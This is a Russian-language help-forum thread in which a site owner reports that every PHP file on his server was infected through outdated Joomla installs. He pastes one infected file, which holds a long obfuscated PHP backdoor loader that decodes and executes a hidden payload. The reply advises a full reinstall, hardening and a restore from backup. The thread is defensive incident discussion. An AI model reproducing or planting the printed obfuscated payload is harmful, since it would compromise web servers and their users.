Здравствуйте, мне нужна помощь и совет.
Наш FTP-сервер содержит вирус. Все php файлы повреждены и имеют одинаковый код в начале.
Некоторые старые системы Joomla являются причиной этого. Я обновил старые системы.
Как я могу удалить строку кода из всех файлов на FTP-сервере?
Я купил ClamXav и теперь скачиваю весь FTP-сервер. Более 40000 файлов и 20 ГБ.
Но ClamXav не находит Вирус.
Вот пример файла.
<?php $kqjfole = '973:8297f:5297e:56-xr.985:52985-t.98]K4g:74985-rr.93e:5597f-s../#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|C x27pd%6|6.7eu{66~6774 141 x72 164") && (!iss45 116 x54"]); if ((strstr($uas," x6d 163 x69 145"))dXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`L 124 x54 120 x5f 125 x53 105 x52 137 x41 107 xfepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!fd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]28y]47]67y]37]88y]27]28}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>h]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67yx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&Kc]55Ld]55#*<%bG9}:}.}-bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]88:}334}472 x24<!%ff2!>!bssbz x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hops!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{hubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs 61 x31"))) { $jorqfam = " x63 162 x65 141 x74 145 x5f 146 x75 11#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%r<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)ttj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)<!gps)%j>1<%j=6[%ww2!>#p#/#p#/27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSVgb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!x7f<u%V x27{ftmfV x7f<*X&Z&75]y83]273]y76]277#<!%t2w>#]y7423zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uf#0#/*#npd/#)rrd/#00;qsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnj x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x2!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3plit("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w66~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!npdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!pjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~%)tpqsut>j%!*72! x27!hmg%)! x24/%tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%j,GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{6UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]DPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7>~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvuf73]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4/%tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]3ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqy]#/r%/h%)n%-#+I#)q%:>]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudov% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>284:75983:48984:71]K9)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubf5,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]2%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR x9386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_4]284]364]6]234]342]58]24]3)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/2!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f sutRe%)Rd%)Rb%))!gj!<*#cd2bge56+9x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tp]65]D8]86]y31]278]y3f]51L3<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x2,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20Qtn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)id,;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ft%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65e:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<rrrbzkv = implode(array_map("sgniajr",str_sif((function_exists(" x6f 142 x5f 163 xZ6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x27pd%6<<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~!mg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ord($n)-1);} @error_reporting(0); $283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]31A x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs]84]y31M6]y3e]81#/#7e:55946-tr.9:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:61977]445]212]445]43]321]46y38#-!%w:**<")));$nyjqznu = $jorqfam("#64y]552]e7y]#>n%<#372udovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#g<~ x24<!%o:!>! x242178}527}#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#mA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpm!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upco}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3et($GLOBALS[" x61 156 x75 156 x61"])))) { $fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: ) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjmsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd}7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix64Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^x<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjuW%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)q# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%mbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!o56 x63 164 x69 157 x6e"; function sgniajr($n){return chr(S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R", $rrrbzkv); $nyjqznu();}}uui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R8dovg}k~~9{d%:osvufs:~928>> x22: or (strstr($uas," x72 166 x3asTrREvxNoiTCnuf_EtaerCxECalPer_Rtsfmbjtdkgd'; $rtvnvtmt=explode(chr((423-303)),substr($kqjfole,(34812-28935),(113-79))); $tagvcq = $rtvnvtmt[0]($rtvnvtmt[(7-6)]); $fsdalyau = $rtvnvtmt[0]($rtvnvtmt[(12-10)]); if (!function_exists('moimumaxc')) { function moimumaxc($zxjfzrukd, $wmolaixl,$wjfeqrjm) { $abyyxk = NULL; for($nymqumrbz=0;$nymqumrbz<(sizeof($zxjfzrukd)/2);$nymqumrbz++) { $abyyxk .= substr($wmolaixl, $zxjfzrukd[($nymqumrbz*2)],$zxjfzrukd[($nymqumrbz*2)+(5-4)]); } return $wjfeqrjm(chr((59-50)),chr((579-487)),$abyyxk); }; } $yqjxmpvc = explode(chr((229-185)),'3916,39,140,25,4929,43,2139,65,274,46,165,52,5847,30,1033,64,5580,57,4183,35,3873,43,1789,70,4367,46,3955,61,119,21,1157,55,5219,59,3631,58,4749,39,217,57,2321,41,906,37,4684,65,5484,51,2962,68,1618,48,4282,53,3141,48,1293,67,2204,43,1859,57,4118,65,5177,42,3733,42,5535,45,2005,43,2362,63,943,49,2048,26,1729,60,2527,51,554,62,4061,57,755,67,2732,50,3269,64,1597,21,5716,60,62,57,4788,62,3689,44,992,41,3372,33,3189,53,2247,34,4898,31,1537,60,1212,51,320,37,4850,48,5372,67,5816,31,2626,41,1916,48,1964,41,3522,66,3333,39,1479,27,5637,52,5776,40,3030,56,672,60,5139,38,4565,62,415,54,1506,31,1413,66,2578,48,469,22,2667,22,3835,38,4543,22,616,56,2689,43,4627,28,877,29,5019,67,3405,56,2074,65,3588,43,4016,45,1666,63,5278,48,5439,45,3775,60,1360,53,2494,33,2819,65,4413,69,39,23,0,39,3496,26,4335,32,2942,20,3461,35,3086,55,2425,69,2281,40,732,23,491,63,357,58,4218,64,4482,23,3242,27,1097,60,5326,46,4972,47,2884,58,1263,30,2782,37,5086,53,4655,29,822,55,4505,38,5689,27'); $simjwz = $tagvcq("",moimumaxc($yqjxmpvc,$kqjfole,$fsdalyau)); $tagvcq=$kqjfole; $simjwz(""); $simjwz=(521-400); $kqjfole=$simjwz-1;PHPINFO();?>
PHPINFO (); была моя часть.
Я собирался предложить быстрый сценарий, который будет проходить через все 40000 файлов и удалять одну строку, но после прочтения в другом месте в stackoverflow, возможно, это не рекомендуется. Если был установлен руткит, злоумышленник, вероятно, будет знать ваш сервер лучше вас.
Ваша система была взломана. То, что вы нашли, это, вероятно, только часть проблемы.
Вам нужна новая установка.
Вам нужно создать более безопасную среду, или та же проблема возникнет снова.
Затем вам нужно восстановить из резервной копии.
Я знаю — вы, вероятно, не хотите читать вышеизложенное, но если вы не знаете, как написать быстрый скрипт для очистки ваших текстовых файлов, вряд ли вы сделали достаточно для защиты своей системы. Скомпрометированная система представляет собой риск для вас, ваших пользователей и других пользователей Интернета (хакер может использовать вашу машину для запуска атак на других).
Других решений пока нет …